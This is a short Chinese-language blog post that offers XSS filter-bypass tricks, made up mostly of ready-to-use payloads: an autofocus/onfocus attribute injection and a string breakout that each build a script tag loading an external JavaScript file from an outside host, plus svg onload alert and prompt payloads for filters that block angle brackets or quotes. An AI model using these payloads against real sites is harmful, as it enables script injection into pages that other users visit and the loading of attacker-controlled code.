這是一篇另類的XSS繞過奇招

1.過濾了<>尖括號: 

原理:利用html以及js僞協議,當用戶打開頁面緩衝頁面會自動獲取焦點,從而觸發js代碼生成script標籤,達到目的。

autofocus οnfοcus=location=”javasCript:s=document.createElement(“script”);s.src=”http:///xx.js”; document.body.appendChild(s);”
 

2.漏洞已經在JS代碼中,但是過濾了<>尖括號:  

原理:利用js代碼創建新script標籤,引入外接js文件,達到目的。

‘;s=document.createElement(“script”);s.src=”http:///xx.js”;document.body.appendChild(s);”

3. <svg/οnlοad=alert(‘1’)/>  

若’單引號被禁,alert(”)可用prompt()代替

<svg/οnlοad=prompt(1)/>

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章